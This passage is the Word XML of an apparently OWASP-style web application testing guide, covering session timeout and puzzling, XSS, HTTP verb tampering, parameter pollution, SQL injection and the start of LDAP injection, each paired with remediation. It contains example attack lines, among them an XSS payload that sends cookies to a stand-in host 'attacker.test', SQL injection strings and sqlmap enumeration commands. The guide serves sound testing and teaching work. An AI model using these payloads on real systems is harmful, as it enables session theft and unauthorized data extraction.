          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-SESS-007  —  Test Session Timeout</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Verify the application enforces a reasonable idle and absolute session timeout, after which all tokens are destroyed or rejected.</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Authenticate, then remain idle for a period exceeding the expected timeout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to use the session after the idle period has elapsed and confirm it is rejected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test whether an absolute maximum session lifetime is enforced regardless of activity.</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(Manual timing test, or replay a stored session cookie via curl after the expected timeout window)</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Enforce both an idle timeout and an absolute session lifetime appropriate to the application's risk profile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Invalidate the session server-side, not only through client-side expiry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-SESS-008  —  Testing for Session Puzzling</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the application reuses the same session variable for multiple, unrelated purposes, which could allow an attacker to reach unintended application states by manipulating the order of requests.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Map every server-side session variable used across different workflows (e.g., a 'stage' or 'temp_user' variable reused between registration and password reset).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to set the variable via one workflow and then invoke a different, unrelated workflow that also reads it, in an unexpected order.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for authentication or authorization decisions that depend on such reused/ambiguous session state.</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(Manual, application-logic-specific testing; no single generic command applies)</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Use distinct, purpose-specific session variables for each workflow rather than sharing generic ones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Explicitly validate the application state/stage before acting on session data, rather than trusting its mere presence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId21"/>
          <w:footerReference w:type="default" r:id="rId22"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CATEGORY 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Validation Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Data validation testing is the largest and most technically diverse category — it covers injection attacks (SQL, LDAP, XML, command, code, ORM, IMAP/SMTP, SSI, XPath), cross-site scripting, HTTP verb/parameter tampering, buffer overflows, HTTP splitting/smuggling, and file inclusion. These vulnerabilities arise wherever untrusted input reaches an interpreter without proper handling.</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3200"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Category Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">INPVAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test ID Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OTG-INPVAL-001 – OTG-INPVAL-016</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-001  —  Testing for Reflected Cross Site Scripting</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 Xenotix XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether user-supplied input is reflected back in the response without proper output encoding, allowing arbitrary script execution in the victim's browser.</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Inject a benign XSS test payload into every input parameter (GET, POST, headers) and observe if/how it is reflected unencoded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Try context-specific payloads (HTML body, attribute, JS string, URL) since encoding requirements differ by context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test with HTTP Parameter Pollution (duplicate parameter names) to see if filters can be bypassed.</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curl "https://target.com/search?q=&lt;script&gt;alert(1)&lt;/script&gt;"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl "https://target.com/search?q=1&amp;q=&lt;script&gt;alert(1)&lt;/script&gt;"</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Apply context-aware output encoding (HTML entity, JS string, URL encoding) at the point of output, not just input filtering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy a Content-Security-Policy header restricting script sources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a modern templating engine that auto-escapes output by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-002  —  Testing for Stored Cross Site Scripting</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 BeEF, XSS Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether user-supplied input is persistently stored and later rendered to other users without proper encoding.</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Submit an XSS payload through every input/upload form that persists data (comments, profile fields, file names).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Browse to every page where that stored data might later be rendered (including admin-facing views) and check for execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If confirmed, demonstrate impact using BeEF to hook the victim browser (in a controlled, authorized test only).</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(Submit via form): &lt;script&gt;fetch('https://attacker.test/c?c='+document.cookie)&lt;/script&gt;</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Apply the same context-aware output encoding as for reflected XSS at every rendering point, including admin panels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitize and validate stored input against an allow-list where rich content is not required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy CSP as defense-in-depth.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-003  —  Testing for HTTP Verb Tampering</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Netcat, curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether access control or input validation can be bypassed by using an alternative HTTP method against a protected endpoint.</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Identify endpoints protected against specific HTTP methods (e.g., POST-only) and resend the request using a different verb (GET, PUT, DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test custom/unexpected verbs to see if the server-side framework mishandles them.</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curl -X PUT https://target.com/api/user/1 -d 'role=admin'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -X DELETE https://target.com/admin/protected-resource</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Ensure access-control middleware validates every supported HTTP method identically, not just the expected one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Explicitly disable unused HTTP methods at the web server/framework level.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-004  —  Testing for HTTP Parameter Pollution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OWASP ZAP, HPP Finder (Chrome plugin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether supplying multiple instances of the same parameter name allows an attacker to bypass input validation or WAF filters, exploiting inconsistent parameter-parsing behavior between the front-end and back-end.</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Submit each user-modifiable parameter twice with differing values (?id=1&amp;id=2) and observe which value the application actually processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to smuggle a malicious value past a WAF by duplicating the parameter, since some WAFs and back-ends parse duplicate parameters differently.</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curl "https://target.com/transfer?amount=10&amp;amount=10000"</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Standardize and document parameter-parsing behavior across the entire stack (WAF, web server, application framework).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reject requests containing duplicate parameter names where not explicitly expected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-005  —  Testing for SQL Injection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(SQLiPy), SQLMap, Seclists/FuzzDB, NoSQLMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether user input is incorporated into SQL queries without proper parameterization, across all major injection techniques (union, boolean, error-based, out-of-band, time-based) and across database engines (MySQL, MSSQL, Oracle, PostgreSQL, MS Access, NoSQL).</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Inject a single quote (') into every input parameter and observe for SQL error messages indicating injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt boolean-based blind injection by comparing responses to always-true vs always-false conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt time-based blind injection using database-specific sleep functions if no visible difference is observed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run SQLMap against confirmed or suspected injectable parameters to automate exploitation and data extraction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For database-specific engines, adapt technique: MySQL (information_schema enumeration, INTO OUTFILE for read/write), SQL Server (xp_cmdshell for OS command execution via -- comment and ; statement separators), Oracle (PL/SQL package access, exclusion-list bypass), PostgreSQL (:: cast operator for engine fingerprinting, COPY for read/write), MS Access (GROUP BY error-based column enumeration), and NoSQL (inject reserved operators like $ne, $gt, or special characters ' " \ ; { } ).</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 OR '1'='1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">' AND SLEEP(5)-- -</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">sqlmap -u "https://target.com/item?id=1" --batch --dbs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">sqlmap -u "https://target.com/item?id=1" -D appdb --tables</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Use parameterized queries/prepared statements exclusively; never concatenate user input into SQL strings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply least-privilege database accounts for the application, and disable dangerous features (xp_cmdshell, INTO OUTFILE) unless strictly required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy a WAF and database activity monitoring as defense-in-depth, not a substitute for parameterization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For NoSQL, strictly type and validate input, and use the driver's parameterized query builder rather than raw string/object construction from user input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-006  —  Testing for LDAP Injection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user input is incorporated into LDAP queries without proper escaping, potentially allowing filter manipulation or unauthorized data retrieval/authentication bypass.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Inject LDAP special characters and wildcard filters into search or login fields.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
